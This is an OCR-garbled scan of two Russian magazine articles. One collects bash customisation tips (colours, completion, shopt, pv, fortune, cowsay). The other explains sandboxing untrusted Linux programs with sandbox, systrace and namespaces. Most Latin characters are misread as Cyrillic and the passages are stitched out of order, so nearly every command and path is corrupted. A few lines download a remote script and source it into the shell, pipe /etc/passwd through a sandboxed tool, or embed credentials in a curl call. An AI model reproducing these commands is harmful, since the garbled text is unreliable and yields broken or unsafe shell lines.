И ІоіЫ:Ьа$Іі 

Файл Правка Вид Закладки Настройка Справка 

асіер1;@асІер1: -Іар1:ор : /$ ссі /есіі/іпіі.сі 
/еіс/іпіі.гі 

айер1@асІерІ -Іаріор : /еХс/іпіХ . сІ$ 



и 



іпіМ : Ъа$Ь 



Корректировка 
ошибок в ЬазН 



[\033 [0т\] \ [\033 [0т\] " 

При необходимости через точку сзапятой можноуказать цвет фона. 
Для этой цели используются числа от40 (черный) до 47 (белый). 

Р31=" [ \ 033 [32;40т\ѵЛ [ \ 033 [0т\] >" 

Все это также можно использовать в скриптах, хотя, чтобы не путать- 
ся, в этом случае лучше задействовать переменные, которые потом и 
вызывать в нужном месте. Например: 

Іосаі СКАУ= " \ [ \ 03 3 [ 1 ; 3 0т\ ] " 

Іосаі КЮ_СОЬОШ= " \ [\033 [0т\] " 

Незабываем отом, что некоторые команды поддерживают цветной 
вывод. Проще это решить при помощи алиасов: 

аііаз 1з= ' 1з --со1ог=аико ' 
аііаз дгер='дгер --со1ог=аиіо 1 

Итакдалее. 

За настройки цветов каталогов и файлов с разным расширением от- 
вечаетутилита сіігсоіогз, устанавливающая переменную І_С_С0І_0П5. 
Чтобы получить все значения, просто вводим: 

$ сіігсоіогз --ргіпР-сІаІіаЬазе 

Использовав полученный результат какшаблон и сохранив его в/ 
еІс/0ІП_С0І_0П5 (либо в персональном конфиге ~/.сііг_соіогз), можно 
создать свою раскраску. 

Программистам будеточень полезен сои! (сосІе.доодІе.сот/р/соіЛ) — 
небольшой скриптна РуіЬоп, подсвечивающий вывод плаке, дсс, зѵп и 
сМ Скрипт нетребуетустановки, просто скачиваем и распаковываем 
архив, а затем создаем псевдоним: 

$ аііаз шакес='соиР сіаРа/шаке-дсс . сід ' 

Теперь проверяем работоспособность, используя заранее подготов- 
ленный Макей Іе: 

$ шакес -і Макеіііе 

Автодополнение Ьа$Н 

Одна из самыхудобных функций, имеющихся в ЬазЬ — автодополне- 
ние команд по клавише <ТаЬ>. К этому быстро привыкаешь, и кажется, 
что улучшить уже ничего нельзя. 

Однако в разныхдистрибутивахавтодополнение работает по-разному. 
Например, в современных Ыпих-дистрибутивах, ориентированных на 
обычного пользователя, Ьазіл нетолько дополняет саму команду, но и 
предлагает дополнительные параметры. Однако в Ѳепіоо и производ- 
ных (вроде Саісиіаіе І_іпих) такого нет. Здесь приходится помнить все 
параметры назубок. Кактакое может быть? Некоторые разработчики 



дистрибутивов используют патченые версии ЬазЬ? 

На самом деле, возможность автодополнения в ЬазЬ — расширяемая 
функция. За необходимую функциональность отвечает встроенная 
команда сотрдеп, генерирующая соответствующие списки. Все 
настройки производятся в файле/еІс/ЬазЬ_сотрІе1:іоп (или пользова- 
тельском ~/.ЬазЬ_сотрІе1:іоп), хотя в некоторых дистрибутивах можно 
найти целый каталог/еІс/ЬазЬ_сотрІейопД в котором обычно собраны 
настройки, специфичные для отдельных программ. 

В самом простом случае файл содержит программу и указания для ЬазЬ 
по дополнению имен файлов. 

Например, чтобы МРІауег предлагал пользователю в качестве а втодо- 
полнениятолькофайлысрасширениемаѵі и трд, пишем такое правило: 

сотріеіе -і -X ' ! * . @ (аѵі I трд | АѴІ I МРС/зо) ' тріауег 

Но это самый простой вариант, ведь МРІауег имеет большое количество 
дополнительных параметров, а значит, ему потребуется описать шриф- 
ты, звуковые файлы, субтитры итакдалее. Все это легко решается при 
помощи оператора сазе. Поддерживаются регулярные выражения, что 
немного упрощает создание правил. 

Обычно майнтейнеры конкретного пакета сами составляютсписки 
параметров программы для ЬазЬ_сотрІе1:іоп. Никаких чудес здесь нет. 
Например, для Іа г создаем та кое правило: 

СОМРКЕРЬУ= ( $ ( сотрдеп -И 'сЬхигйА 1 -- " $сиг" ) ) 

Каквидишь, мы просто перечислили все параметры, и теперь в процес- 
се ввода ЬазЬ сам выдаст этотсписок. 

Команда сотрдеп имеет ряд параметров. Так'-Ь' позволяет получить 
списоквстроенных команд оболочки, '-с' — имена команд, ’-ѵ' — имена 
переменных итакдалее. Все подробности можно найти в тап-странице 
ЬазЬ, в секциях сотріеіе и сотрдеп. 

Продвинутые настройки 

ВазЬ — довольно развитый командный интерпретатор, поддержива- 
ющий кучу разных настроек. Причем из этих настроек можно получить 



Перенос директории сІоШез 



Перенос директории сЫЫез с одного компа (ІР-адрес 192.168.1.1, 
порт 10000) на другой при помощи пеіюаі: и рѵ: 

Ь.озЫ$ Саг -сі — сіокіііез I рѵ I пс -1 -р 10000 -д 5 
ЬозЦ2$ пс 192.168.1.1 10000 I рѵ I Саг -хі - 

В случае, если Ьозіі работает под управлением ОрепВЗО, коман- 
да должна выглядетьтак: 

оЪзсИюзк1$ Саг -сі — сіоііііез I рѵ I пс -1 10000 
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Коровка в консоли может выводить полезную 
информацию 






В юзер-ориентированных дистрибутивах разработчики 
позаботились об автодополнении команд 

гораздо больше профита, чем из настроек поведения терминала, вы- 
полненных с помощью утилит зеиеггп и зПу. Список всех возможных 
опций можно посмотреть командой «зборі -р» (зборі: — сокращение от 
ЗЬеІА Орбопз). Приведем самые интересные из них: 

• аиіоссі — если эта опция включена, то можно просто написать путь к 
каталогу (опустив команду сб), чтобы в него переместиться; 

• ссізреіі — ЬазЬ будет пытаться исправлять простые опечатки (напри- 
мер, /есі/іпіі.б вместо /еіс/іпіі:. б) в аргументах команды сб ; ; 

• сНескщЬз — не даетвыйти из консоли, пока в ней есть выполняющи- 
еся задания; 

• стсІЫз* — объединение многострочных команд в одну строку та к, 
чтобы тебе было проще искать их в истории; 

• бігзреіі— исправление небольших ошибок в написании имени 
директории при автодополнении; 

• дІоЬзІаг — позволит использовать конструкцию вида **, обозначаю- 
щую «все файлы, начиная стекущего каталога, рекурсивно»; 

• Оченьудобный новый ѵѵіІбсЬаг — например, данная конструкция 
отобразит все трЗ в текущем и вложенных каталогах: 

$ Із **/* .трЗ 

Согласись, это гораздо короче и удобнее, чем: 

$ Ііпсі ./ -пате " *.трЗ" -Суре 1 -ргіпЕ 

Устанавливаются опции следующим образом: 

$ зЬорЕ -з аиЪосс! ссізреіі сЬескпоЬз стсІІіізЪ сіігзреіі 
дІоЪзкаг 




Выводим базу данных І.С_СОЮК5 



Кромето ГО: 

1. ВазЬ умеет сокращать путь ктекущему каталогу в приглашении, 
если он становится слишком длинным. Для управления этой фун- 
кцией предусмотрена переменная окружения РР0МРТ_01РТР1М. 
При превышении уровня вложенности каталогов, указанного в этой 
переменной, путь будет сокращен. Пример использования: 

$ ехрогі РКОМ РТ_Б I НТК. I М = 3 

2 . ВазЬ поддерживает «умный» метод помещения команд в историю, 
позволяя освободить ее отбанальностей вроде Із. В историю не 
будут попадать дубликаты и команды Із, Ьд, [д, ехіі после выполнения 
следующей команды: 



Пишем в твиттер легко 
и непринужденно 



Простая функция, отправляющая сообщения втвиттер: 

$ ѵі ~/ . Ъазіігс 

Іѵо.1 ( ) 

{ 

сигі --Ьазіс --изег юзер: пароль --сіаіа 
з1аРиз= " $* " ' Ыір : / /Імікіег . сот/зкакизез/ирсіаіе . 
хті ' -о /сіеѵ/пиіі; 

} 

Использоватьтак: 

$ 'Привет из консоли' 

Незабываем про 140 символов. 



$ ехрогі НІЗТІСЖЖЕ="&: Із : [М]д:ехіР" 

3. ВазЬ умеет делать так, чтобы команды, выполненные с исполь- 
зованием зибо, автоматически попадали в файл истории гооі'а и не 
засоряли историю пользователя. Просто добавь следующую строку в 
файл /еІс/Ьазб.ЬазІпгс: 

ехрогР НІЗТРІЬЕ=$НОМЕ/ . ЬазП_МзР- 'ѵДюаті ' 

Индикатор прогресса 

Отсутствие индикатора прогресса у большинства консольныхутилит 
— одна из главных проблем для тех, кто часто работает в консоли. И 
хорошо, если под рукой есть тс, который многиетак и используют, 
чтобы получить окошко с прогрессом. А что если это голая консоль, а 
тебе требуется сохранить бэкап на флешку, смонтированную в режи- 
ме зупс? В этом случае тебе поможет гзупс, который хоть и несколько 
замедляет процесс копирования, но зато обеспечивает вывод на 
экран шкалы прогресса. Помещаем в -/.ЬазЬгс следующую строку: 
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аііаз срг= ' гзупс --ргодгезз' 

И используем команду срг вместо ср: 

$ срг іііеі И1е2 

Если добавить опцию '--гетоѵе-зоигсе-біез', то исходные файлы 
будутудалены (правда, следует помнить, что в пределах одной 
файловой системы ппѵ гораздо быстрее гзупс). Единственный минус 
— прогресс отображается для каждого файла в отдельности, общий 
прогрессувидеть нельзя. 

Чтобы увидеть ход выполнения, например, при создании архива, 
можно использовать утилиту рѵ (Ріре Ѵіеѵѵег). Технически она пред- 
ставляет собой замену стандартного саі, способную не только тупо 
копировать байты на выход, но и показывать прогресс этой операции. 
Например: 

$ Іаг -С7.І — /раІИ/Іо/сІіг I рѵ > /раІИ/Іо/агсЫѵе.Ідг 

758МВ 0:01:29 [8,48МВ/з] [ <=> 

Уже хорошо. Но не хватает времени завершения. Для этого надо 
передать утилите рѵ размер каталога (в байтах) с помощью ключа ’-з': 

$ Ваг -сгі — /раСЪ./Со/с1іг | рѵ -з $(с!и -зЬ /раЫт/Со/сІіг | 

дгер -о 1 [0-9]*') > /раЫі/Цо/агсЬ.іѵе . Сдг 

461МВ 0:00:21 [ 32МВ/з] [============================= 

==========> ] 60% ЕТА 0:00:13 

Каждый раз набирать та кую конструкцию не оченьудобно, лучше 
сделать алиас. 

Закладки каталогов в консоли 

При выполнении операций администрирования приходится часто 
переходить по каталогам файлового дерева. Вазб поддерживает 
ряд сокращений (например, чтобы вернуться в домашний каталог, 
просто вводим «сб», в предыдущий каталог — «сб -»), но этого мало. 
Конечно, можно использовать псевдонимы (аііазез), вроде: 

аііаз ссіілплпл?= ' ссі /ѵат /шш ' 

Но этого все равно бывает недостаточно в том случае, если спи- 
сок каталогов большой. И главное — использование алиасов не 
оченьудобно. Так, чтобы создать новый псевдоним, нужно вручную 
прописать его в -/.Ьазбгс и перезапустить терминал. Небольшой 



скрипт Оігесіогу Вооктагкзіюг ВА5Н (бігЬ.іпЬ/ЬазЬОігВ) расширяет 
набор сокращений, позволяя на лету создавать закладки на нужные 
каталоги и переходить в них короткой командой. 

Скачиваем: 

$ ѵ/деі -с ЫгСр : / /ѵты . сіігЬ . іпіо/ЬазІіБігВ -о -/.ЬазЦБігВ 
И добавляем в файл -/.Ьазбгс строку: 
зоигсе -/.ЬазЫЭігВ 

Теперь каждая новая сессия будет поддерживать закладки. Перехо- 
дим в нужный каталоги сохраняем его в закладку: 

$ ССІ /ѵаг/-\лПлПЛГ 
$ 3 Ѵ\ДлПл7’ 

После этого будет создан файл ~/. О і гВ/ѵѵѵѵѵѵ, содержащий ссылку на 
закладку. Теперь, чтобы вернуться вуказанный каталогслюбого места 
файловой системы, достаточно ввести в консоли «д ѵѵѵѵѵѵ». Аналогич- 
ным образом можно создавать любое количество закладок. 

Но это не все параметры. Например, параметр «р» позволяет запом- 
нить последние перемещения и выводит их в консоли: 

$ р ѵѵѵѵѵѵ 

/ѵаг /шш 



Ноѵѵ тисЬ і$ Же РІ5Н? 



Новичкам в консоли следует внимательно посмотреть в сторону 
альтернативного командного интерпретатора под названием ЕІ5Н 
(Егіепбіу ІпЩгасбѵеЗЬеЩ. Его преимущества перед ЬазЬ довольно вну- 
шительны. ЕізЬ на полную катушку использует возможность управле- 
ния цветамитерминала. Он оснащен гораздо более мощной системой 
автодополнения, которая выводит на экран нетолько списки катало- 
гов, аргументов и имена команд, но и массу другой полезной информа- 
ции (например, рядом с каждой опцией помещается описаниетого, что 
она делает). В ЕізЬ встроена оченьхорошая система подсказок, так что 
еслиты допустишь ошибку, то получишьобширное разъяснениетого, 
что произошло, и способы обхода проблемы. Наконец, скриптовый 
язык Еізб гораздо проще и логичнее стандартного языка зЬ. 
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Рекурсивный глоббинг в Ьа$Н4 



$ ііогЕипез -і 

После установки все фортунки помещаются в один из подкатало- 
гов/изг/зЬаге/датезЛогІшпез, откуда их и забирает программа. 

В случае необходимости при помощи ключа '-ітГ можно указать 
шаблон фортунок, которые будут выводиться. После добавления 
своих фортунок следует использовать утилиту зігбіе для создания 
индекса (зігбіе файл_фортунок). 

При желании можно грабить Р55-новости, твиты, прогноз погоды 
или котировки валюте любого сайта, выводя их в качестве форту- 
нок. Хотя для этого мне больше нравятся аналоги Гэгіипез — пакеты 
соѵѵзау и хсоѵѵзау. Соѵѵзау представляет собой приложение на Регі, 
которое выводит изображение говорящей или думающей коровы, 
нарисованной А5СІ 1-символам и. 

$ зисіо арЕ-деС іпзЕаІІ соѵѵзау хсоѵѵзау 

По умолчанию корова не знает, что сказать, умную мысль ей надо 
подкинуть. Например, выведем ирііте: 

$ ирЕіте I соѵѵзау 

Или фортун ку (так реализовано в І_іпих Міпі): 

$ соѵѵзау 1 ЕогЕипе ' 

Кроме стандартной коровы доступны и другие персонажи, соот- 
ветствующие названию файлов в подкаталоге /изг/збаге/соѵѵзау/ 
соѵѵз. Вызвать их можно при помощи параметра '-Г. Также ряд 
параметров изменяют внешний в ид коровы:' -К — усталая корова, 
’-р' — параноидальная, ' -ѵѵ' — обалдевшая и такдалее. Чтобы авто- 
матизировать процесс, заносим строку запуска в -/.Ьазбгс: 

СОѴ\ГОІК= /изг /зЬаге/ соѵѵзау /соѵ^з/ ; 

СОШШ=$ ( ($ШШБОМ%$ ( 1 з $СОЖ>ІК | тес -1) ) ) ; 

С(ЖРІЬЕ=$ ( 1з $СОЖ)ІК | зесі -п ' ' $СОШШ ' р ' ) ; ЕогЕипе I 
сотезау -і $СОЮЕ1ЬЕ 

Заключение 

Собственно, это все. Следуя рекомендациям, описанным в статье, 
ты сможешь сделать работу в консоли гораздо более удобной и про- 
дуктивной, а также освободить время для более важных занятий, □с 



И, наконец, команда зі позволит просмотреть л истин г за кладок. 
Для удаления закладки используем ключ '-г'. 

Также следуетзнать, что ЬазЬОігВ модифицирует переменную 
Р51 таким образом, что в приглашении выводится время и номер 
текущего каталога в Ьізіогу. Если тебя это не устраивает, просто 
закомментируй соответствующую строку в скрипте. 

В качестве альтернативы ЬазЬОігВ можно использовать аррагіх 
( тісапз.огд/аррагіх ). предлагающий три команды: Ьт (создание 
закладки), Іо (переход кзакладке) и рогіаі (добавление подка- 
талогов в закладки). Помимо ЬазЬ также поддерживается сзб. 

Пакет доступен в репозитарии ОеЬіап/СІЬипІи и некоторых других 
дистрибутивов. 

Фортунки 

В некоторых Ыпих-дистрибутивах после запуска консоли выво- 
дится небольшая цитата. Практической пользы от нее вроде и нет, 
но небольшое шуточное высказывание повышает настроение и 
настраивает на рабочий лад. Тематические пакеты с базами выска- 
зываний называются Ьгіипез, а сами цитаты — фортун ками. 

За несколько десятков лет в Сети появилось большое количество 
сборников цитат, которые легко интегрируются в консоль. Чтобы 
установить их в ОеЬіап или ІІЬипІи, достаточно ввести команду: 

$ зисіо арЕ-деЕ іпзЕаІІ ЕогЕипез ЕогЕипез-сІеЬіап- 
ЦіЕз ЕогЕипез-иЬипІи-зегѵег ЕогЕипез-тіп ЕогЕипе-шосі 
ЕогЕипез-ги 

Последние два пакета содержат большое количество афоризмов на 
русском. Кроме этого, в интернете доступны и другие русскоязыч- 
ные сборки фортунок, найти которые очень просто — достаточно 
вбить в Гугле Ьгіипез-ги и получим несколько десятков ссылок 
(например, избранные цитаты с сайта Ііпих.огд.ги : Іогдиоіез.ги/ 
Ьгіипез.рбр ). 

После установки необходимо настроить вывод цитат в консоль. В 
самом простом случае достаточно прописать в конфиг~/.Ьазбгс 
всего одно СЛОВО: 

$ есРю " РогРипе" » -/.ЬазЬгс 

Далее следует перезапустить терминал или перезагрузить файл на- 
строек (команда «зоигсе -/.ЬазЬгс»), Список выводимых категорий 
фортунок можно получить, введя: 
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Евгений Зобнин гоЬпіпгадтаіІ.сот, 



ІЛМІХОЮ 



Зоопарк 
на карантине 

Запускаем небезопасный софт без вреда системе 

• Совсем скоро писатели троянов и прочей нечисти всерьез возьмутся 
за пингвина и наберутся знаний, чтобы создать по-настоящему опасные 
вирусы. Даже уже существующих троянов не так просто отличить от 
легальных программ, зато их всегда можно поместить в карантин, 



Многие даже очень грамотные пользовате- 
ли ІІІЧІХ-подобных систем считаютсвои ОС 
неуязвимыми кразного рода программной 
заразе. И одна из главных причинтакой 
уверенности —традиция устанавливать софт 
через проверенные, подписанные сертифика- 
тами репозитории, которые по определению 
не могут содержать зловредных программ. 
Вторая причина — разделение прав, бла- 
годаря которому мал вари довольно трудно 
навредить системе или прописаться в автоза- 
грузку (пользователи ѴѴіпсІоѵѵз любят наделять 
себя правами админа, в II N IX это нетолько не 
поощряется, но часто и вовсе запрещено). 
Можно долго говорить о том, насколько абсур- 
дна такая уверенность; о 95% пользователей 
ІІЬипІи, которые спокойноустанавливают 
любой подсунутый им беЬ-пакет; о до смешно- 
го простом способе перехвата пользователь- 
ского пароля с помощью программтипа хзру; 
об автозагрузке КОЕ и 6ІЧ0МЕ, прописаться в 
которую можно, создав скрипт, состоящий из 



одной стро ки . . . Н о это статья о д ру го м . В ко н це 
концов, все мы люди, и никто из нас не за- 
страхован отошибок, ктомуже иногда очень 
трудно отказать себе в запуске программы, 
скачанной из непроверенного источника. 

Руки прочь от файлов 

Один из наиболее популярныхспособов 
помещения приложения в изолированную 
среду — это такназываемые песочницы, 
которые в Ыпих представлены системным 
вызовом сЬгооЕ во ЕгееВЗО —технологией 
]аіІ (тюрьма), в Зоіагіз — зонами (или, говоря 
языком маркетологов, контейнерами). Все 
это отличные способы изолировать софтину 
отосновной системы так, чтобы она не смогла 
ей навредить. Однакоу всехтрехтехноло- 
гий есть несколько недостатков, которые 
делают их неудобными для использования на 
домашнем компе. Все они требуют создания 
полной копии существующей системы, на что 
тратится время, дисковое пространство (что 



на сегодняшний день, правда, нетакважно) и 
нервы. Все технологии относительно просты 
в использовании, нотребуют чтения доку- 
ментации и вникания в детали. Кроме всего 
прочего, голый сбгооісам по себе никогда не 
являлся инструментом обеспечения безопас- 
ности, а потому уязвим для многихтипов атак. 
Программу можно запустить в виртуальной 
машине, но эта процедура опять же потребует 
создания выделенной машины, скачивания/ 
создания образов, перемещения приложения 
между реальной и виртуальной машиной. В 
общем, проблем и возни предостаточно. 

Нам же требуется простое средство, с по- 
мощью которого можно в одну-две команды 
послать приложение туда, откуда оно уже не 
выберется. И здесь мы должны задуматься 
отом, какую функциональность приложения 
следуетограничивать. Ведь если программе 
запретить абсолютно все, ее полезность ока- 
жется нулевой (более того, мы даже не сможем 
понять, зловредна ли она вообще). 
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паеіѵе-Ьіпсі : зоскасісіг таъсН иЬеп регтіс. 

паЪіѵе-ЪішІ; зоскасШг кіа^сЗі Ъйеп регтпіс 

лаІіѵи-Ьііні: зоскасЫі маСсЬ іііып ретіь 

пасіѵе-Ьгеак: регтіе 

паНіѵе-сЬсІігг Гііепаше ед Екеп регтіЛ 

пасіѵе-сЗігоо^ : Еііепате ед ЕЬеп ретин 

паНіѵе сгіозе: регтіН 
паніѵе-сІоаеНглт: регтт 

паНіѵе - сопле сі : здскэскЗг ед іЪеп регшіЕ: 

паЬіѵе-соппесН: зоскайсіг шаЪсМ н.Ьел репиіЕ 

пасіѵ«-(іир2 : регтір 

паЫѵе-ехіНі регтіН 

паСіѵе-ЕспЫ : регтіі 

паг.іѵе Ейгк; регтіг. 

пасіѵе Езгеасі: Іііепагае зиЪ ЕЗіеп, <Депу [еіюепЕ] 

паніѵе-Езгеай: Еііепате ед нЬеп ретін 

паЕіѵе Езгеасі; Іііепаше ед нЬеп реггпіЕ 

паНіѵс-ЕзгсасІ: Еііепате сд ЕЬсп рогтаіЕ 

паНіѵе-ГвгеасІ: Гііепате ед ЕЬеп реппіЕ 

паМѵл-Еягеай! I - і Іепаие ед Е&еп регтіс 

ааніѵе-Гзгеай; Гііепате ед ' ЕКеп ретіЕ 

пасіѵе-Езгеасі: Еііспате ед сЕіеп регтіЕ 

[паШѵе Езгеасі? ГІІепате ед нііеп ніепу[ерегт) 



нгасе/изг зЬт паілесі 



Ограничение возможностей демона патесі с помощью зузЕгасе 



Чаще всего пользователи беспокоятся за сохранность 
своихданных, поэтому многим из нихстановится все 
равно, какую именно информациютроян сможет отослать 
в интернет или к какой бот-сети подключить машину. 

На первый взгляд кажется, что защитить конфиденци- 
альные данные просто. Для этого можно использовать 
дополнительную учетную запись, выступающую в роли 
карантина: создаем пользователя (который не состоит ни 
в каких системных группах) и запускаем команду отего 
имени с помощью зисіо. Работая с правами этого пользо- 
вателя, программа не сможет прочитать или модифициро- 
вать твои файлы паролей, ключей итакдалее, не сможет 
прописаться в автозагрузку КРЕ или 6ІМ0МЕ. Аесли 
установить правильные права доступа на файлы своего 
основного пользователя (600, например), то и содержимое 
всех обычных файлов окажется в сохранности. 

К сожалению, такой «псевдокарантин» не спасетсистему 
от серьезной заразы, способной использоватьлокальные 
уязвимости и архитектурные недостатки Ыпих, поэтому 
придется ограничивать программу нетолько в возмож- 
ности просматривать локальные файлы пользователей, 
но и лишать ее других ресурсов (скажем, сетевого обмена 
данными, возможности запуска других приложений или 
работы с локальными сервисами). Но обо всем по порядку. 

Режем все 

Хорошая, эффективная система изоляции приложений 
должна быть построена на многоуровневой основе, кото- 
рая могла бы предотвратить компрометацию системы в 
случае выхода приложения за границу одного изуровней. 
Так, например, запустив приложение, подозреваемое 
в хищении личной информации, под именем неприви- 
легированного пользователя, мы создадим лишь один 
уровеньзащиты, и, если зловред найдетспособ получить 
права другого пользователя в системе, то он легко прочтет 
все его важные данные и отправитихзлоумышленнику 
любым из доступных способов. Но если мы создадим 



второй уровень защиты в виде запрета на использование 
определенных сетевых протоколов или вообще отклю- 
чим все сетевые возможности приложения — кражи не 
произойдет(если, конечно, программа не сможетобойти 
и этотзапрет). Проблема только втом, что в ядре Ыпих 
нетуниверсального способа ограничения приложений в 
доступе к ресурсам. 

В свое время предпринималось множество попыток 
созданиятакихуниверсальных механизмов и продвиже- 
ния их в ядро, но в результате пользователи получили не 
универсальность, а разбростехнологий.Такчто сегодня 
Ыпих насчитывает как минимум четыре «карантинные 
системы»: 

1. Хостовые системы обнаружения вторжений (НЮ5), такие 
какВЕЫпих и АррАгппог, позволяюточеньтонко контро- 
лировать потребности приложений в ресурсах, но они 
слишком сложны в использовании рядовыми юзерами. 

Это учли ДэнУэлш и ЭрикПэрис, создавшие утилиту 
запбЬох, которая используетуже подготовленные жесткие 
политики для запуска приложений в песочнице. 

2 . Системный вызов рігасе позволяет отслеживать то, 
какими системными вызовами пользуется приложение, 
перехватывать их и блокировать в случае необходимости. 
Это наиболее популярный и единственный полностью 
кроссплатформенный способ ограничения, используемый 
в таких утилитах, какріазб, зусІЬох и зузігасе, ноунегоесть 
минус — излишняя медлительность. 

3. Пространства имен. Операционная система Ріап 9 оста- 
вила свой отпечаток в Ыпих нетолько в виде виртуальной 
файловой системы ргос^з и кодировки ІІТР-8, но и в виде 
системного вызова сІопеО и так называемых пространств 
имен. Любой процесс Ыпих, начиная сядра 2.4.19, может 
создать подпроцесс с совершенно иным представле- 
нием файловой системы. Если, например, родитель и 

все остальные процессы видят файловую систему как 
содержимое раздела /беѵ/зба 1 , смонтированного ккорню, 
плюс/беѵ/збаб, смонтированного к/Ьоте, и ргосІБ к/ргос, 




> іпіо 

• Для тестовых 
запусков приложений, 
требующих права 
суперпользователя, 
можно использовать 
утилиту ^акегооі, 
позволяющую создать 
иллюзию того, что 
программа запущена 
пользователем 

гооІ (становится 
возможным изменить 
любой файл системы). 

• ОиЬезОЭ ( дибез- 
оз.огд ) — Ыпих- 
ди стр и бути в, 
полностью 
построенный на 
идее изоляции 
процессов друг от 
друга с помощью 
виртуализации. 

• Утилиту запббох, 
основанную на 5ЕІ_і- 
пих, легко заставить 
примонтировать 
выбранные каталоги 
к каталогам / 
Ьоте/$ІІ5ЕР и Дтр. 
Для этого есть опции 
' - Н ' и '-Т: «запббох 
-Н -Лаке боте -Т ~/ 
(акеіітр ѵі». 
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ІІІЧІХОЮ 



> зисіо запсІЬох -і ігтірТз -с зЬ 
Угіпд ітр'Рз "Рог сору-оп-шг ііе 

> ісі 

и і сі- 1000 ( ] 1 т ) діс1=1000( ^ 1 т ) аруг 
ѵісіео) , 100(и5ег5) , 117(ѵЬохи5ег5 

ЗапсІЬох от Стефана Грабера полностью изолирует приложение от основной системы 



то потомок может видеть вместо этого /б еѵ/зсІа2, смонтированный к 
корню, плюс/сІеѵ/5СІа7, смонтированный к/гооі, и пустой каталог/ргос. 
Причем то, как будет выглядеть файловая система для потомка, пол- 
ностью определяет родитель. Механизм пространств имен позволяет 
поместить процесс в свой обособленный файловый мирок, который не 
будет виден всем остальным процессам. В ядрах ветки 2.6 кфайловому 
пространству имен были добавлены пространства имен процессов, 
сети и ІРС. Так что теперь процесс может видеть не только другую ФС, 
но и другой набор системных процессов, сетевые интерфейсы (с собс- 
твенными настройками маршрутизации и файрвола) и очереди ІРС. 

На пространствах имен основана система І_ХС и простой, ноудобный 
скрипт, написанный Стефаном Грабером ( зІдгаЬег.огд ). 

4 . Режим зессотр позволяет полностью запереть приложение в самом 
себе.такчто при попытке использоватьлюбой системный вызов, кро- 
ме ехіі(), а также геасіО иѵѵгіІеО в отношении уже открытых файловых 
дескрипторов, оно будет уничтожен о. Для нас в та ком жестком ограни- 
чении нет ничего полезного, но оно необходимо для работы некоторых 
клиентов (ЗРЮ (которые представляют собой небольшие программы, 
получающие данные на входи посылающие результат их обработки на 
выход), а также для изоляции плагинов и вкладок в браузере Ѳоодіе 
СЬготе. 

Кроме способности создавать многоуровневые системы изоляции, 
хорошая песочница должна уметь определять, какие действия должны 
быть разрешены приложению по умолчанию. Любой школьник пони- 
мает, что было бы глупо запрещать ѵѵеЬ-браузеру создавать сетевые 
соединения и втоже время разрешитьему выполнятьсистемный 
вызов ехес() или читать файл /еіс/раззѵѵсі, но как объяснить это 
программе, реализующей песочницу? Существует четыре возможных 
варианта: 

1. Возложить работу по составлению правил на плечи пользователя, 
как это делают ЭЕЫпих и АррАгтог. Это самый эффективный и гибкий 
вариант, у которого есть всего один серьезный недостаток — слож- 
ность. Даже матерые сисадмины считают процесс составления правил 
ЭЕЫпих нелегким занятием, что уж говорить о тех, кто просто решил 
запустить браузер в песочнице. 

2 . Мета-правила. Позволить пользователю самому составлять пра- 
вила, облегчив задачу с помощью упрощен ия и группировки правил. 
Например, вместо массы разных правилтипа «разрешить открывать 
ТС Р - с о е д и н е н и я к п о рту та ко м у-то та ко го -то х о ста » с д е л ат ь о д н о б о л ь - 
шое правило «разрешить сетевой доступ». Гибкость и безопасность 
системы снизятся, зато удобство использования резко возрастет. В 
ЭЕЫпихтакое возможно. 

3. Самообучение. Во время первых нескольких запусков приложения 
песочница анализирует потребности программы в ресурсах и сама 
составляет правила. Это удобно на сервере, администратор которого 
беспокоится о безопасности своих сетевых сервисов, однако втом 
случае, когда мы изначально не можем доверять приложению, этот 
вариант не подходит. 



4 . Сигнализировать пользователю каждый раз, когда приложение 
пытается задействовать ресурсы ОС. Этот вариант очень похож на тот, 
который используют многие файрволы ѴѴіпсІоѵѵз, выводящие окно с 
вопросом «Разрешить/Запретить» при инициализации нового сете- 
вого соединения. Разумный вариант, который, тем не менее, требует 
от пользователя достаточно глубоких знаний в области архитектуры 
операционных систем. 

Теперь, когда мы разобрались стем, что должна уметь и какфунк- 
цион и ровать хорошая песочница, посмотрим на то, что нам могут 
предложить программисты. В следующихтрех разделах мы изучим 
три разные реализации песочниц для приложений: утилиту запсІЬох, 
использующую возможности ЭЕЫпихдля помещения приложений в 
карантин; зузіхасе, опирающийся на системный вызов рігасе; и прос- 
той руіЬоп-скрипт, использующий пространства имен. 

ЗапсІЬох — ЗЕНпих с человеческим 
лицом 

ЗапсІЬох — это утилита, созданная для облегчения запуска непрове- 
ренных приложений в песочнице ЭЕЫпих с максимальным уровнем 
изоляции. В отличие от«голого»5ЕІ_іпих, утилита нетребует какой бы 
то ни было первоначальной настройки и можетбыть использована аб- 
солютно любым пользователем, независимо отего уровня подготовки. 
Функциональность приложения, запущенного под управлением 
запсІЬох, оказывается сильно ограниченной. В частности, программа 
не сможет открыть или создать ни один файл; доступ к сетевым функ- 
циям ОС будет полностью отрезан; несколько программ, запущенных 
под управлением запсІЬох, не смогут воздействовать друг на друга. В 
то же время программа с может подгружать библиотеки, работать с уже 
открытыми файловыми дескрипторами, писать втекущийтерминал 
и получать доступ к временному хранилищу данных, расположенно- 
му в оперативной памяти. Благодаря стольжестким ограничениям, 
запсІЬох оказывается почти бесполезным при запуске простых кон- 
сольных утилит. Все, что можно сделать, это просто заставить непрове- 
ренную командуобработать какие-либо данные. Например: 

$ саЬ /еЬс/раззжі I запсІЬох сиЬ -Ь: -Г1 > /Ьтр/изегз 

Утилита сир запущенная внутри песочницы, с может получить доступ 
кстандартным входным и выходным потокам, а потому спокойно 



Начиная еще с версии 2.2, ядро І_іпих реализует механизм под назва- 
нием сараЫІібез, позволяющий наделять приложения полномочиями 
суперпользователя только для выполнения строго определенных 
функций (например, приложение может выполнять перезагрузку 
системы, но не способно получить доступ кдругим возможностям 
суперпользователя). 
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> здзігасе -1 1з 

/Ып/Іе, рісі: 26465(0)10], роі 

да: 216 

йпзиег: регт М 

/Ьіп/І5, рісі: 26465(0 )[0], ро] 
Ті ІЕпапіБ ; /еіс/ ІсІ . зй . гюНшсар 
Йпашегі регшН 

/Ып/Ів. рісі; 26465(0»Ш], ро] 
оі: РРОТ„»ЕНОІРВ0Т„иР|ТЕ 
Рп5ь»ег: регігіі 

/Ып/15, рісіг 26465(6)10], ро] 
гдз: 216 
Йпзиег ; регігіі 

/Ып/)е, рісі; 26465(0)Г0], ро] 
гдз; 216 
Рпзиег : регігіі 

/Ып/Ів, РІСІГ 26465(0 ) [0] , ро] 
да; 216 

Йпзиег; регігіі 

